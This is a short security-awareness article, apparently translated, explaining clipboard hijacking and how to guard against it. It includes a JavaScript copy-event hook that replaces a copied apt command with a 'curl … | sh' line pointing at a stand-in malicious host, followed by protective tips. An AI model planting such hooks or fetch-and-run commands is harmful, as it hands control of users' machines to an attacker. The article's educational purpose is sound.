How they can violate you with a simple copy-paste

An unusual hacking demonstration will make you think twice before copying or pasting any text.

This is why you should NEVER copy pasting commands directly to your terminal. Ask any developer or administrator if they have ever copied a command line or code snippet from the web. The answer would probably be YES. You'll assume what you copied is what you paste, right? Well, no!

You think you're copying one thing, but it's replaced with something else, like malicious code. All it takes is a single line of code inserted into the code you copied to create a backdoor to application you.

This attack is very simple but can cause great damage. Let's see how it works in practice:

Thanks to Harel Friedlander for writing this one video.

Suppose you are looking for how to update your ubuntu and found the following command, Copy it. Try it - copy and paste the following command:

$ sudo apt update

 

Here is the JavaScript running exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]"\n'
    );
    e.preventDefault();
});

How can I protect myself?

The safest way is to paste nothing from the web into your terminal. Another option is to add "#" before pasting, this will turn the command into a "comment" and will not execute it. This way you will see what you will paste before your terminal runs. You can of course paste the command into a txt file before putting it in your terminal.
Also many terminals can be configured not to run automatically when you paste a "\ n" (new line)

The above was just one example of why awareness is necessary to avoid any invasions. There are many examples of truly malicious scripts circulating on the internetnetwork.